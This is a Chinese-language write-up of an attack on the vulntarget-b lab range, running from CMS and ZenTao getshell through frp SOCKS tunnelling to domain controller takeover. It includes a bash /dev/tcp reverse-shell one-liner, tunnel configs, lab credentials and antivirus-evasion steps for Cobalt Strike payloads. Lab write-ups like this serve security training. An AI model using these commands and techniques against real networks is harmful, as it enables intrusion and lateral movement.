Vulntarget-b
0 信息收集
刚刚看到scaninfo
这款工具,顺手试了下效果还可以。
{"ip":"192.168.1.114","port":21,"service":"ftp","Banner":"220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x0d\\x0a220-You are user number 1 of 50 allowed.\\x0d\\x0a220-Local time is now 14:48. Server port: 21.\\x0d\\x0a220-This is a private system - No anonymous login\\x0d\\x0a220-IPv6 connections are also welcome on this server.\\x0d\\x0a220 You will be disconnected after 15 minutes of inactivity.\\x0d\\x0a500 HTTP command: [get]\\x0d\\x0a","url":""}
{"ip":"192.168.1.114","port":22,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"192.168.1.114","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":25,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":80,"service":"http","Banner":"","url":"http://192.168.1.114:80"}
{"ip":"192.168.1.114","port":81,"service":"http","Banner":"","url":"http://192.168.1.114:81"}
{"ip":"192.168.1.114","port":8888,"service":"http","Banner":"","url":"http://192.168.1.114:8888"}
{"url":"http://192.168.1.114:80","StatusCode":200,"Title":"没有找到站点","HeaderDigest":"server:nginx","Length":1326,"KeywordFinger":"宝塔-BT.cn","HashFinger":""}
{"url":"http://192.168.1.114:81","StatusCode":200,"Title":"极致CMS建站系统","HeaderDigest":"server:nginx","Length":14398,"KeywordFinger":"","HashFinger":""}
{"url":"http://192.168.1.114:8888","StatusCode":200,"Title":"安全入口校验失败","HeaderDigest":"server:nginx","Length":802,"KeywordFinger":"宝塔-BT.cn","HashFinger":"宝塔-BT.cn"}
有两个开放的web服务,一个是8888端口的宝塔,一个是81端口的极致CMS建站系统
宝塔有点烦,看看极致CMS先
1 打点
扫了下目录,基本都是403,就readme.txt
和admin.php
有用
readme.txt中有版本号
极致CMS Beta1.8.1 ,admin.php
是后台登录入口,搜一手漏洞,看到了先知上的这篇文章,弱口令试了好些,最后试出来admin/admin123
,按照步骤操作即可
用蚁剑连接,执行命令时发现返回ret=127
,需要绕过disable_functions
,直接用插件绕过
2 内网信息收集
当前主机ip192.168.1.114
,查看网段。。。发现没有响应
换个大马上去,发现大马执行命令提示不存在
换了个思路,用/proc/net/arp
查看
小小火说可以用/sbin/*
来执行,因为没有加到环境变量里(默认是/usr/bin
)
发现存在内网网段,10.0.20.0/24
,以及存活主机10.0.20.66
(arp表)
使用scaninfo指定ip,不探测存活进行扫描./scaninfo -np -i 10.0.20.66
{"ip":"10.0.20.66","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.20.66","port":8080,"service":"http","Banner":"","url":"http://10.0.20.66:8080"}
{"url":"http://10.0.20.66:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""
3 内网穿透
使用frp
进行内网穿透
在公网vps上运行frps
,frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7788
在目标机器上运行frpc
,frpc.ini
[common]
server_addr = x.x.x.x # vps公网ip
server_port = 7788
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
运行./frpc -c frpc.ini
,服务端接收到连接
4 内网主机-1
10.0.20.66:8080
,禅道管理系统
访问http://10.0.20.66:8080/index.php?mode=getconfig
查询版本信息
点击使用demo账号登录,进入后台,使用CNVD-C-2020-121325
漏洞getshell,但这个漏洞需要管理员账号
好兄弟告诉我账号密码是admin/Admin123
。。。
使用python在10.0.20.30
上起一个http服务,python -m SimpleHTTPServer 11881
按照漏洞利用步骤操作就可以了
是个低权限用户
有域vulntarget.com
,在10.0.10.0/24
网段
tasklist /svc
发现火绒
5 搭建二级隧道
一级代理不要断
部署顺序(先服务端,再客户端):可出网主机-服务端---> 内网主机-客户端 ---> vps-服务端 ---> 可出网主机-客户端
vps
[common]
bind_addr = 0.0.0.0
bind_port = 7799
allow_ports = 1000-2000
可出网主机-客户端
[common]
server_addr = 47.102.44.211
server_port = 7799
[http_proxy]
type = tcp
local_ip = 10.0.20.30
local_port = 1080
remote_port = 1080
可出网主机-服务端
[common]
bind_addr = 10.0.20.30
bind_port = 7799
allow_ports = 1000-2000
内网主机-客户端
[common]
server_addr = 10.0.20.30
server_port = 7799
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
本来是想挂代理上大马的,结果一直没上去,就用代理继续往下打了。
6 拿下域控-方法1
把scaninfo传上去,扫了一下,直接拿到了域控账号密码(scaninfo牛逼
)
{"ip":"10.0.10.99","port":445,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.99","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.99","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00M\\x7f\\x81à\\x9c;Ø\\x01 þ\\x08>\\x00\\x89ÓÀ\\x0bÁ]µwV\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.99","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n [->]WIN-UH20PRD3EAO\n [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100 [+]DC VULNTARGET\\WIN-UH20PRD3EAO Windows Server 2016 Datacenter 14393"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"admin@123","username":"administrator"}
{"smb":"smb","host":"10.0.10.100","password":"Admin@123","username":"administrator"}
用搭好的代理rdp即可
7 拿下域控-方法2
因为蚁剑的shell是无状态的,比较麻烦,所以在可出网主机上反弹个shell出来bash -i >& /dev/tcp/ip/port 0>& 1
查看系统版本信息cat /proc/version
,cat /etc/redhat-release
查了下有好几个可以提权的cve,但是运行时会报error(环境变量问题),所以要另寻出路,cs也用不了,只剩下msf了
搜了下msf有自动提权的插件suggester
,试试看
(中间因为vps上的msf加载suggester
的插件加载不出来,所以用的frp+本地的kali)
后来发现是最新版本的bug?又转回vps,使用pkexec
提权成功
shell
进入交互式shell,发现在root目录下有个flag
运行cs大马,上线成功,而且执行命令正常
生成一个pivot listener,相当于中继
因为4.2不能拿到pivot listener的payload,所以用web delivery,然后下载,拿出shellcode,然后免杀
上线上了老半天,上不去,我猜测是linux的session没法pivot
换个思路,让他出网上线,用goproxy
,(第一次开启状态ok但没法用,第二次正常)
创建一个走代理的beacon
生成stageless
的payload,免杀,上传,运行,上线!
搜了下补丁,可以用CVE-2021-1732
提权,但是火绒直接给杀掉了,先不提权了,做下信息收集,10.0.10.0
段除了本机,只有一台存活主机
用scaninfo
扫一下,确认是域控
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00\\x96ë«W`<Ø\\x01 þ\\x08>\\x00+\\x011Ø\\x14lÃ*V\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n [->]WIN-UH20PRD3EAO\n [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100 [+]DC VULNTARGET\\WIN-UH20PRD3EAO Windows Server 2016 Datacenter 14393"}
测试了一下,发现在cs里运行提权脚本是不会被杀的(迷惑),但提权脚本需要按下任意键继续
,查了一下,可以通过echo
来完成
但没法用在这里,然后修改了源码删掉了pause
,找大哥帮忙编译好之后,运行被杀了。。。想起来之前没被杀是因为没有输入回车,没有执行下去。
然后把exp做了个免杀,还是不行。人已经麻了。这块提权要靠msf,直接把exp加载到内存执行,且逻辑完整,不需要输入。
鸽了。。。vulntarget-b得用msf才行,暂时还没用cs打的思路